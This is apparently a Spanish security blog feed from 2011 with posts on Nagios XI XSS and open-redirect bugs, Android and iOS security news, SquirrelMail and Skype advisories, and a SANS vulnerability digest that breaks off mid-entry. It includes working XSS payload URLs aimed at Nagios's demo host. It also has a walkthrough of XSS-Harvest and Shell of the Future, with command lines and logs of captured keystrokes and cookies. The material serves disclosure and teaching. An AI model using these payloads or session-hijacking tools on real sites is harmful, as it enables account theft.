Pablo Ramirez Hoffmann

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 19 Jul 2011 14:39:00 +0000

Bug: XSS

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2824%29;%3C/script%3E

http://nagioxi.demos.nagios.com/nagioxi (Search Field)

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=services&hoststatustypes=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E&servicestatustypes=28

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?&show=services&servicetatusty pes=0&hoststatustypes=12&hostattr=””

XSS en Nagios XI más BonusTrack

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 19 Jul 2011 14:26:00 +0000

Con Bonus Track:

Al hacer "Vista Previa" del post, sale este mensaje en www.blogger.com... y para los que entiendan, sabrán a los que me refiero.

Como en todo software opensource, existe la versión enterprise, que en el caso de Nagios se denomina Nagios XI. En este post vamos a ver algunos fallos de seguridad que ya han sido notificados al equipo de desarrollo de esta herramienta y en la nueva release dejaran de estar, afortunadamente. Vamos a comenzar a buscar posibles puntos de fallo, para lo que usaremos la demo que podemos visitar en su sitio web: http://nagiosxi.demos.nagios.com/.

Una de las cosas que me pareció curiosa, es que esta versión de Nagios usa URLs limpias, por lo que podríamos decir que oculta las variables GET. No obstante, no por estar ocultas, estas variables dejan de existir, ya que si posicionamos el ratón sobre un enlace podremos ver como efectivamente los parámetros se pasan usando variables GET.

En esta captura podemos ver como al hacer click sobre “Hostgroup Summary” la URL que nos muestra el navegador está limpia pero el direccionamiento se nutre de variables GET que podemos explotar del siguiente modo:

Como podemos observar lo único que se ha hecho ha sido copiar el enlace del link y modificar las variables GET para obtener un XSS. Cabe destacar que todas las variables GET de esta versión de Nagios XI son susceptibles a XSS. Existen otros campos capaces de recibir un ataque XSS como por ejemplo el campo “search”:

O también en otros campos de entrada como puede ser el de filtro de páginas:

Cómo último ejemplo observaremos el campo “DashBoard Title”, que se ejecuta al previsualizar los distintos Dashboard que tenemos:

Cabe destacar que estos fallos se pueden corregir fácilmente filtrando todas las variables GET y campos de entrada que tengamos en la web utilizando para ello diversas funciones, que dependiendo del lenguaje varían. En php por ejemplo tenemos el caso del html_entities que nos puede ayudar en esta tarea.
Existe otro fallo en Nagios XI el cual también ha sido informado al fabricante y en la siguiente release dejará de estar, al igual que los fallos comentados anteriormente. En este caso el fallo es un URL Redirect Abuse, que permitiría al atacante redirigir al usuario a una página maliciosa. Este fallo se encuentra en la siguiente URL:

Como se puede observar hemos insertado una página inofensiva como es Google como PoC, pero podriamos insertar cualquier otra página. Este fallo se puede mitigar filtrando la dirección que se le pasa, para evitar que nos redirijan a páginas no deseadas.

RESUMEN:

Bug: XSS

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?show=%22%3Cscript%3Ealert%2823%29;%3C/script%3E%22%3Cscript%3Ealert%2823%29;%3C/script%3E

http://nagioxi.demos.nagios.com/nagioxi (Search Field)

http://nagiosxi.demos.nagios.com/nagiosxi/includes/components/xicore/status.php?&show=services&servicetatusty pes=0&hoststatustypes=12&hostattr=””

http://nagiosxi.demos.nagios.com/nagiosxi/ (Latest Alert)

Bug: Redirect Abuse

http://nagiosxi.demos.nagios.com/nagiosxi/admin/?xiwindow=http://www.google.es

Fuente: http://naxonez.wordpress.com/

NAC para iPhone e iPad

noreply@blogger.com (Pablo Ramirez Hoffmann) — Tue, 19 Jul 2011 13:55:00 +0000

Safenet ha lanzado una nueva tecnología que permite el uso de iPhones e iPads de Apple ampliando control de acceso a red seguro (NAC), ampliando su plataforma de autenticación a los dispositivos con sistema operativo iOS.

Según Safenet, su nuevo software de seguridad para iPhones e iPads forma parte del entorno de autenticación y de los centros y del entorno de gestión de autenticación de la compañía, permitiendo así a los usuarios securizar y auditar el acceso a los recursos corporativos vía móvil.

Los portavoces de la compañía aseguran que, integrando la gestión de credenciales para dispositivos móviles en una plataforma de autenticación unificada, las empresas pueden confiar en que únicamente los usuarios autorizados tienen acceso a sus redes y recursos corporativos.

Aunque más de una empresa ofrece ya aplicaciones de autenticación token basada en software para el iPhone y el iPad, esta es la primera vez que se ha llevado un entorno NAC a los tablets e iPhones.

Según Laurence Pingree, la nueva oferta de Safenet resulta especialmente atractiva para las organizaciones teniendo en cuenta que “el acceso a los datos corporativos valiosos desde dispositivos que a veces son incluso desconocidos, genera un enorme riesgo para la seguridad”.

SandBox para Android

noreply@blogger.com (Pablo Ramirez Hoffmann) — Mon, 18 Jul 2011 14:45:00 +0000

El aumento de aplicaciones maliciosas que han ido apareciendo para Android, (no solo en "markets" alternativos, sino también en el oficial) ha motivado la creación de la primera sandbox para Android.

Una sandbox permite recrear un escenario virtual seguro donde analizar las aplicaciones de forma dinámica, pudiendo detectar las acciones que realiza a distintos niveles y registrándolas para un análisis más en profundidad. Existen desde hace mucho para PC. Organizaciones públicas y privadas permiten el envío de un fichero y se devuelve un informe de su actividad.

La virtualización ha permitido facilitar mucho el proceso, aunque también los atacantes han sabido aprovecharse de esta circunstancia. Buena parte del malware de PC actual sabe detectar si se encuentra en un entorno virtual o en una sandbox y puede o bien no ejecutarse o bien modificar su comportamiento. Con esto dificultan su estudio.

Aunque ya existían algunas sandbox privadas para Android, el proyecto HoneyNet supone la primera sandbox gratuita por todo el que quiera montar su propio laboratorio en casa. La versión actual es alfa, lo que implica que, aunque inmadura, es funcional.

DroidBox, como ha sido bautizada, hace uso de TaintDroid, un proyecto para la monitorización en tiempo real creado por varias universidades estadounidenses e Intel. Por ahora, DrodiBox crea un informe tras la ejecución de una aplicación que devuelve la siguiente información:

Operaciones de lectura y escritura de ficheros
La actividad de las API criptográficas
Conexiones de redes abiertas
Salida de tráfico
Fuga de información a través de ficheros SMS, o redes
Intentos de envío de SMS
Llamadas realizadas.

Más información:
HoneyNet :
http://www.honeynet.org/node/744

Google Code:
http://code.google.com/p/droidbox/

Project Web:
http://www.honeynet.org/gsoc/slot5

TaintDroid:
http://www.appanalysis.org/

Robo de sesiones HTTP mediante XSS

noreply@blogger.com (Pablo Ramirez Hoffmann) — Mon, 18 Jul 2011 14:30:00 +0000

Un ataque de Cross Site Scripting (XSS) se produce cuando se inyecta código malicioso en forma de script en el lado del navegador, es decir, a través del cliente, en una página web en otro usuario final diferente que visita dicha página en cuestión. Este tipo de vulnerabilidad está muy extendida y puede afectar a cualquier aplicación web que utiliza la información de un usuario en la salida que genera a través del navegador Web, sin validación o codificación de los datos de entrada de la aplicación.

En múltiples ocasiones, no se le da la importancia que realmente tienen este tipo de ataques. Mediante una vulnerabilidad de XSS es relativamente sencillo enviar código malicioso a otro usuario desprevenido. El navegador del usuario objetivo no tiene forma de saber si lo que recibe es confiable y ejecuta el código malicioso al suponer que el script proviene de una fuente segura. Este script puede acceder a las cookies, los tokens de sesión u otra información sensible robando incluso la sesión. El código a inyectar y ejecutar puede ser VBscript, Javascript, etc.

Existen diferentes herramientas que son capaces de explotar vulnerabilidades de Cross Site Scripting para robar esas sesiones del usuario. Una de ellas es la recientemente publicada XSS-Harverst que facilita enormemente realizar ataques de XSS y que intenta concienciar sobre el impacto real que una vulnerabilidad de este tipo puede tener en una página web.

XSS-Harvest está escrito en lenguaje Perl y no ocupa más de 11 Kb. Con licencia GNU, no necesita de ningún servidor Web ni de motor de bases de datos para funcionar y, además, es multi-thread o multi-hilo, lo que le permite ejecutar tareas distintas a la vez y disponer de un gran rendimiento. Únicamente, al estar desarrollado en Perl, necesita de un intérprete del lenguaje independientemente de si es bajo Unix/Linux o Windows.

Entre las funcionalidades de XSS-Harvest destacan:

· Los scripts de infección añaden detectores para los eventos importantes como las pulsaciones del teclado o los clicks del ratón en la página Web vulnerable y establecen la comunicación con el sistema XSS-Harvest.

· Cualquier tecla que se pulse o cualquier click del ratón será analizado y enviado, de forma secreta, al servidor XSS-Harvest.

· De forma opcional, es posible redireccionar la página Web vulnerable para mostrar otra página diferente en el mismo subdominio, como, por ejemplo, un formulario de acceso.

· Realiza un seguimiento de las víctimas a través de las cookies para detectar futuras visitas a la página Web.

· Cada víctima tiene un archivo diferente con el histórico correspondiente que contiene todos los eventos, cookies y pulsaciones del teclado que se derivan de su visita por la página. El fichero se encuentra localizado dentro de donde se ejecuta XSS-Harvest en el directorio "history" y con el formato loquesea.txt.

· XSS-Harvest dispone de una consola que muestra los datos recibidos en tiempo real. - Funciona también con Internet Explorer 9 para ataques de Cross Site Scripting indirecto o reflejado, con Firefox 5, Google Chrome y con varios de los navegadores Web para dispositivos móviles como Safari y Android.

· Es capaz de evadir los métodos antiXSS de los navegadores como, por ejemplo, la regulación de peticiones de Internet Explorer a la misma dirección (URL) cuando se extraen datos de un equipo o el plugin NoScript de Firefox.

El funcionamiento, desde la línea de comandos, es muy sencillo y presenta diversas opciones con diferentes parámetros de ejecución (-l, -p y -r):

XSS-harvest.pl -l http://web.vulnerable/login.html

Lo primero es encontrar una página Web que presente alguna vulnerabilidad de Cross Site Scripting. Se puede verificar que la vulnerabilidad existe insertando la sentencia

Fig 1. Confirmación de la vulneravilidad de XSS en la página de Hacktimes.com

El puerto por defecto por el que escucha el servidor XSS-harvest es el 80 (HTTP) pero es posible definir cualquier puerto con el parámetro -p. En este caso, se define el puerto 8080 (opción -l de listener y -p para especificar el puerto utilizado):

XSS-harvest.pl -l -p 8080 http://www.hacktimes.com/login.php

***************************

* XSS-Harvest Server *

***************************

[INFO] Starting Server....

[INFO] History directory found.

2011/07/09-12:00:21 XSSHarvest::NetServer0 (type Net::Server::PreFork) starting! pid(11122)

Using default listen value of 128

Binding to TCP port 8080 on host http://www.hacktimes.com/login.php

Revisando el archivo de texto creado con el histórico de los eventos detectados se observan cosas como las siguientes:

*************************************

[INFECTION] Sat Jul 9 12:01:11 2011

[IP] 192.168.1.23

[UID]

[UA] Mozilla/50 (X11; Linux x86_32; rv:5.0) Gecko/20100101 Firefox/5.0

*************************************

[PAGE_LOADED] Sat Jul 9 12:01:11 2011

[URL] http://www.hacktimes.com/infect.html

[COOKIES]

login=hacktimes

password=hacktimes

*************************************

[DATA] Sat Jul 9 12:01:11 2011

[CLICK RECEIVED]

[COORDS] 111,11

[TAGNAME]INPUT

[NAME]fname

*************************************

Otra herramienta muy interesante y fácil de utilizar es Shell of the Future o SOTF (http://www.andlabs.org/tools/sotf/sotf.html) de la gente de Attack and Defense Labs que funciona bajo Windows. Al arrancar el programa se obtiene la siguiente pantalla donde lanzar y configurar la aplicación en modo proxy por el puerto por defecto 133

Fig 2. Inicio y configuración de la aplicación Shell of the Future

Dispone de consola Web que es accesible configurando un proxy local (127.0.0.1 y el puerto 1337) en el navegador Web y cargando la siguiente dirección en la barra de direcciones http://127.0.0.1/sotf.console:

Fig 3. Consola de Shell of the Future

A continuación, en la página vulnerable de hacktimes de antes, se inyecta el código malicioso javascript que incluye la propia herramienta Shell of the Future (e1.js o e2.js). Se han incluido dos scripts, uno bastante elemental (e1.js) y otro más completo (e2.js) que incluye un link invisible hacia el servidor SOTF y un capturador de eventos "onmousemove" para controlar el cursor en todo momento:

http://www.hacktimes.com/login.php=

La consola ha cambiado y muestra la sesión que se acaba de robar del usuario desprevenido que está visitando la página vulnerable de hacktimes:

Fig 4. Consola de Shell of the Future donde se muestra una sesión de usuario robada

Fig 5. Desde la consola de SOTF se puede acceder a la sesión robada y se incluye un banner personalizable "Session Hijacked by..."

Shell of the Future no guarda históricos pero su facilidad de uso y que no precisa de instalación alguna lo convierten en una aplicación más que recomendable.

Referencia: http://www.hacktimes.com/robo_de_sesiones_http_mediante_xss/

0day XSS en Skype

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 15 Jul 2011 18:10:00 +0000

Levent Kayan (noptrix), ha reportado una vulnerabilidad de cross-site scripting permanente en Skype que afecta a las versiones anteriores a 5.3.0.120 y las plataformas Windows XP, Vista, 7 y Mac OS X.

Como todos los cross-site scripting, el error está causado por una falta de validación de los datos introducidos en la entrada del perfil "Mobile phone". Esto permite a un atacante remoto obtener el identificador de sesión de la víctima y por tanto, secuestrar su identidad. El descubridor no descarta que otros campos sufran el mismo problema.

Levent Kayan ha publicado una prueba de concepto que demuestra la vulnerabilidad, utilizando un iframe y la función onload de JavaScript. Afirma que avisará a Skype del problema, por tanto no existe parche oficial disponible.

Las PoC:

http://www.noptrix.net/tmp/skype_xss.png

http://www.noptrix.net/tmp/skype_linux.ogv

http://www.noptrix.net/tmp/skype_winxp.ogv

http://www.noptrix.net/tmp/skype_win7.avi

Solución:

Skype validó el input de investigador pero hasta el momento no se sabe de un parche.

Vulnerabilidades en SquirrelMail

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 15 Jul 2011 17:57:00 +0000

Se han reportado tres vulnerabilidades en SquirrelMail que afectan a las versiones 1.4.21 y anteriores. Un atacante remoto podría aprovechar estas vulnerabilidades para ejecutar ataques cross-site scripting o eludir restricciones de seguridad.

Las vulnerabilidades son las siguientes:

CVE-2011-2023: Vulnerabilidad localizada en el fichero "functions/mime.php" al procesar los parámetros de entrada con tags de estilo y que podría permitir a un atacante remoto ejecutar código HTML arbitrario y sctipts con los privilegios del usuario que lance el navegador.

Parche: http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/mime.php?view=patch&r1=14133&r2=14120&pathrev=14133

CVE-2010-4554: Vulnerabilidad causada por no validar correctamente una petición HTTP. Esto podría ser aprovechada por un atacante remoto para obtener información sensible a través de una página especialmente manipulada.

Parche: http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/page_header.php?view=patch&r1=14117&r2=14116&pathrev=14117

CVE-2010-4555: Vulnerabilidad localizada en el fichero "functions/options.php" al no procesar correctamente las entradas en una lista despegable. Podría ser aprovechado por un atacante remoto para inyectar código.

Parche: http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail?view=revision&revision=14119

El corrector ortográfico de SquirrelMail tampoco procesa adecuadamente el carácter ">" a la hora de devolver un texto al usuario, pudiendo devolver un código HTML erróneo que podría ser aprovechado por un atacante remoto para realizar un ataque cross-site scripting.

Las vulnerabilidades han sido corregidas en la versión 1.4.22 y puede ser descargada desde la página oficial
http://www.squirrelmail.org/download.php.

Más información:
SquirrelMail Security Advisories
http://www.squirrelmail.org/security/issue/2011-07-10
http://www.squirrelmail.org/security/issue/2011-07-11
http://www.squirrelmail.org/security/issue/2011-07-12

Sistemas Afectados:

Vulnerable:

SquirrelMail SquirrelMail 1.4.21
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Red Hat Fedora Core2
SquirrelMail SquirrelMail 1.4.20
SquirrelMail SquirrelMail 1.4.19
SquirrelMail SquirrelMail 1.4.18
SquirrelMail SquirrelMail 1.4.17
SquirrelMail SquirrelMail 1.4.16
SquirrelMail SquirrelMail 1.4.15
SquirrelMail SquirrelMail 1.4.12
SquirrelMail SquirrelMail 1.4.11
SquirrelMail SquirrelMail 1.4.9 a
+ Debian Linux 4.0
SquirrelMail SquirrelMail 1.4.8
SquirrelMail SquirrelMail 1.4.7
SquirrelMail SquirrelMail 1.4.6 -rc1
SquirrelMail SquirrelMail 1.4.6 -cvs
SquirrelMail SquirrelMail 1.4.6
SquirrelMail SquirrelMail 1.4.5
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 3.0
SquirrelMail SquirrelMail 1.4.4 RC1
SquirrelMail SquirrelMail 1.4.4
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Debian Linux 3.1
+ Debian Linux 3.1
+ Gentoo Linux
+ Gentoo Linux
+ Gentoo Linux
SquirrelMail SquirrelMail 1.4.3 RC1
SquirrelMail SquirrelMail 1.4.3 r3
+ Gentoo Linux
SquirrelMail SquirrelMail 1.4.3 a
+ Conectiva Linux 9.0
+ Red Hat Fedora Core3
+ Red Hat Fedora Core3
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Red Hat Fedora Core2
SquirrelMail SquirrelMail 1.4.3
SquirrelMail SquirrelMail 1.4.2
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 3.0
+ Red Hat Fedora Core2
+ Red Hat Fedora Core2
+ Red Hat Fedora Core2
SquirrelMail SquirrelMail 1.4.1
SquirrelMail SquirrelMail 1.4 RC1
SquirrelMail SquirrelMail 1.4
SquirrelMail SquirrelMail 1.2.11
SquirrelMail SquirrelMail 1.2.10
SquirrelMail SquirrelMail 1.2.9
SquirrelMail SquirrelMail 1.2.8
+ Terra Soft Solutions Yellow Dog Linux 3.0
SquirrelMail SquirrelMail 1.2.7
+ RedHat Linux 8.0
SquirrelMail SquirrelMail 1.2.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
SquirrelMail SquirrelMail 1.2.5
SquirrelMail SquirrelMail 1.2.4
SquirrelMail SquirrelMail 1.2.3
SquirrelMail SquirrelMail 1.2.2
SquirrelMail SquirrelMail 1.2.1
SquirrelMail SquirrelMail 1.2 .0
SquirrelMail SquirrelMail 1.0.5
SquirrelMail SquirrelMail 1.0.4
SquirrelMail SquirrelMail 1.4.20 RC2
SquirrelMail SquirelMail 1.4.10
SquirrelMail SquirelMail 1.4.10a

Resumen de Vulnerabilidades - Semana 29

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 15 Jul 2011 14:01:00 +0000

______________________________________________________________________

@RISK: The Consensus Security Vulnerability Alert

Week 29 2011
______________________________________________________________________

Summary of Updates and Vulnerabilities in this Consensus

Platform Number of Updates and Vulnerabilities
- ------------------------ -------------------------------------

Windows 3 (#1)
Third Party Windows Apps 6 (#2)
Linux 1
HP-UX 1
Cross Platform 7
Web Application 3
Network Device 5

*************************************************************************
Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)
Widely Deployed Software
(1) HIGH: Microsoft Windows Bluetooth Stack overflow
(2) MEDIUM: Trend Micro Control Manager Multiple Vulnerabilities

****************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys
(www.qualys.com)

-- Windows
11.29.1 - Microsoft Windows Bluetooth Stack Remote Code Execution
11.29.2 - Microsoft Windows CSRSS Multiple Local Privilege Escalation Vulnerabilities
11.29.3 - Microsoft Windows Kernel "Win32k.sys" Multiple Vulnerabilities

-- Third Party Windows Apps
11.29.4 - ESTsoft ALPlayer ".asx" File Buffer Overflow
11.29.5 - Chilkat Crypt ActiveX Control "SaveDecrypted()" Insecure Method Vulnerability
11.29.6 - ZipWiz 2005 ".zip" File Buffer Overflow
11.29.7 - Effective File Search (EFS) DLL Loading Arbitrary Code Execution
11.29.8 - ZipItFree ".zip" File Buffer Overflow
11.29.9 - Trend Micro Control Manager "CASProcessor.exe" BLOB Remote Code Execution

-- Linux
11.29.10 - Debian an d Ubuntu foo2zjs Insecure Temporary File Creation Vulnerability

-- HP-UX
11.29.11 - HP-UX Dynamic Loader Unspecified Local Privilege Escalation

-- Cross Platform
11.29.12 - Apache XML Security for C++ Signature Key Parsing Denial of Service
11.29.13 - libpng PNG File Denial of Service
11.29.14 - Opera Web Browser Multiple Security Weaknesses
11.29.15 - IBM WebSphere MQ CDP Extension Revoked SSL Certificate Validation Security Bypass Vulnerability
11.29.16 - libsndfile PAF File Integer Overflow
11.29.17 - libvte9 "vte_sequence_handler_multiple()" Function Remote Denial of Service
11.29.18 - SAP MaxDB NULL Pointer Dereference Denial of Service

-- Web Application
11.29.19 - phpMyAdmin Multiple Remote Vulnerabilities
11.29.20 - DotNetNuke Multiple Security Bypass Vulnerabilities
11.29.21 - Ferdows CMS Cross-Site Scripting and Multiple SQL Injection Vulnerabilities

-- Network Device
11.29.22 - Cisco Content Services Gateway Malformed ICMP Messages Denial of Service
11.29.23 - D-Link DSL-2650U Remote Denial of Service
11.29.24 - Aruba Networks ArubaOS HTTP Response Splitting and HTML Injection Vulnerabilities
11.29.25 - Ingate Firewall and SIParator SIP Module Remote Denial of Service
11.29.26 - Symantec Web Gateway Management GUI SQL Injection Vulnerability
______________________________________________________________________

PART I Critical Vulnerabilities
Part I for this issue has been compiled by Josh Bronson at TippingPoint,
a division of HP, as a by-product of that company's continuous effort
to ensure that its intrusion prevention products effectively block
exploits using known vulnerabilities. TippingPoint's analysis is
complemented by input from a council of security managers from twelve
large organizations who confidentially share with SANS the specific
actions they have taken to protect their systems. A detailed description
of the process may be found at
http://www.sans.org/newsletters/risk/#process

*************************************************************

(1) HIGH: Microsoft Windows Bluetooth Stack overflow
Affected:
Windows Vista Service Pack 1,2
Windows Vista x64 Edition Service Pack 1,2
Windows 7 for 32-bit Systems
Windows 7 for 32-bit Systems Service Pack 1

Description: Microsoft has released a patch addressing a security
vulnerability in its Bluetooth driver code. By sending malicious
Bluetooth packets, an attacker can cause the driver code to access
uninitialized or deleted objects and then execute arbitrary code on a
target's machine with SYSTEM-level privileges. This vulnerability
requires the Bluetooth driver to be enabled.

Status: vendor confirmed, updates available

References:
Vendor Site
http://www.microsoft.com
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx
SecurityFocus BugTraq IDs
http://www.securityfocus.com/bid/48617/discuss

*************************************************************

(2) MEDIUM: Trend Micro Control Manager Multiple Vulnerabilities
Affected:
Trend Micros Control Manager 5.0 and 5.5

Description: Trend Micro has released a patch for Control Manager, its
web-based security management console, addressing two vulnerabilities.
The first vulnerabilities involves the CASProcessor.exe process, which
listens on port 20801 by default. By sending a malicious request, an
attacker can exploit an integer overflow vulnerability in order to
execute arbitrary code with SYSTEM-level privileges. The second involves
the Cas_LogDirectInsert.aspx http handler, which listens for HTTPS
messages on port 443. By sending a POST request with malicious
information, an attacker can inject commands used to query the backend
database and create a new account. Using this account and the management
console, they can then execute arbitrary commands on the target machine.

Status: vendor confirmed, updates available

References:
Vendor Site
http://www.trendmicro.com
Vendor Advisory
http://esupport.trendmicro.com/solution/en-us/1058292.aspx
Zero Day Initiative Advisories
http://www.zerodayinitiative.com/advisories/ZDI-11-234/
http://www.zerodayinitiative.com/advisories/ZDI-11-235/
SecurityFocus BugTraq IDs
http://www.securityfocus.com/bid/48638
http://www.securityfocus.com/bid/48652

*************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 11686 unique vulnerabilities. For this
special SANS community listing, Qualys also includes vulnerabilities
that cannot be scanned remotely.
______________________________________________________________________

11.29.1 CVE: CVE-2011-1265
Platform: Windows
Title: Microsoft Windows Bluetooth Stack Remote Code Execution
Description: Bluetooth is an industry standard protocol that enables
wireless connectivity for computers and other devices. The application is
exposed to a remote code execution issue because the Bluetooth stack fails
to adequately handle specially crafted Bluetooth packets. The issue affects
the "bthport.sys" driver. Windows Vista SP1 and SP2, Windows 7 and Windows 7
SP1 are affected.
Ref: http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx
______________________________________________________________________

11.29.2 CVE: CVE-2011-1281, CVE-2011-1282, CVE-2011-1283,
CVE-2011-1284, CVE-2011-1870
Platform: Windows
Title: Microsoft Windows CSRSS Multiple Local Privilege Escalation
Vulnerabilities
Description: Multiple local privilege
escalation issues affect the Microsoft Windows Client/Server Runtime
Subsystem (CSRSS) because it fails to sufficiently allocate memory
when dealing with specific user transactions. Windows XP SP3 and x64
SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server
2008 and Server 2008 SP2, Windows 7 and Windows 7 SP1, Windows Server
2008 R2 x64 and x64 SP1 are affected.
Ref: http://www.microsoft.com/technet/security/bulletin/MS11-056.mspx
______________________________________________________________________

11.29.3 CVE: CVE-2011-1874, CVE-2011-1875, CVE-2011-1876,
CVE-2011-1877, CVE-2011-1878, CVE-2011-1879, CVE-2011-1880,
CVE-2011-1881, CVE-2011-1882, CVE-2011-1883, CVE-2011-1884,
CVE-2011-1885, CVE-2011-1886, CVE-2011-1887, CVE-2011-1888
Platform: Windows
Title: Microsoft Windows Kernel "Win32k.sys" Multiple Vulnerabilities
Description: Microsoft Windows is exposed to multiple security issues
that occur in the Windows kernel "Win32k.sys" kernel mode device driver.
Multiple local privilege escalation issues are caused by a NULL pointer
dereference error that occurs due to a failure to properly manage
pointers to certain kernel driver objects. Multiple local privilege
escalation issues occur because an use-after-free error occurs due to
improper driver object management. A local information disclosure issue
occurs because it fails to properly validate certain function
parameters. Windows XP SP3 and x64 SP2, Windows Server 2003 SP2, Windows
Vista SP1 and SP2, Windows Server 2008 and Server 2008 SP2, Windows 7
and Windows 7 SP1, Windows Server 2008 R2 x64 and x64 SP1 are affected.
Ref: http://www.microsoft.com/technet/security/bulletin/MS11-054.mspx
______________________________________________________________________

11.29.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: ESTsoft ALPlayer ".asx" File Buffer Overflow
Description: ALPlayer is a media player available for Microsoft
Windows. ALPlayer is exposed to a stack-based buffer overflow issue
because it fails to perform adequate boundary checks on user-supplied
input. Specifically, this issue occurs when opening a specially
crafted ".asx" playlist file. ALPlayer 2.0 is vulnerable and other
versions may also be affected.
Ref: http://www.securityfocus.com/bid/48583/discuss
______________________________________________________________________

11.29.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: Chilkat Crypt ActiveX Control "SaveDecrypted()" Insecure Method
Vulnerability
Description: Chikat Crypt ActiveX control is used to encrypt, hash,
and sign data. The application is exposed to an issue caused by an
insecure method that lets attackers overwrite files with arbitrary,
attacker-controlled content. This issue occurs in the
"SaveDecrypted()" method of the "ChilkatCrypt2.dll" ActiveX control.
aTube Catcher version 2.3.570 is vulnerable and other versions may also
be affected.
Ref: http://www.securityfocus.com/archive/1/518740
______________________________________________________________________

11.29.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: ZipWiz 2005 ".zip" File Buffer Overflow
Description: ZipWiz 2005 is a file compression application. The
application is exposed to a buffer overflow issue because it fails to
perform adequate checks on user-supplied input. Specifically, this
issue occurs when processing a specially crafted ".zip" file. ZipWiz
2005 5.0 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48624/discuss
______________________________________________________________________

11.29.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: Effective File Search (EFS) DLL Loading Arbitrary Code
Execution
Description: Effective File Search is a file search utility for
Microsoft Windows. The application is exposed to a security issue
because the application searches for the "ztvunrar36.dll" Dynamic Link
Library in the current working directory. The issue can be exploited by
placing both a specially crafted library file and a file that is
associated with the vulnerable application in an attacker controlled
location. Using the application to open a ".efs" file will cause the
malicious library file to be executed. Effective File Search 6.7 is
vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48608/discuss
______________________________________________________________________

11.29.8 CVE: Not Available
Platform: Third Party Windows Apps
Title: ZipItFree ".zip" File Buffer Overflow
Description: ZipItFree is a file compression application. The
application is exposed to a heap-based buffer overflow issue because
it fails to perform adequate checks on user-supplied input.
Specifically, this issue occurs when processing a specially crafted
".zip" file. ZipItFree 3.0 is vulnerable; other versions may also be
affected.
Ref: http://www.securityfocus.com/bid/48629/discuss
______________________________________________________________________

11.29.9 CVE: Not Available
Platform: Third Party Windows Apps
Title: Trend Micro Control Manager "CASProcessor.exe" BLOB Remote Code
Execution
Description: Trend Micro Control Manager is a Web-based management
console. The application is exposed to a remote code execution issue.
The issue affects the "En_Utility.dll" file when communicating with
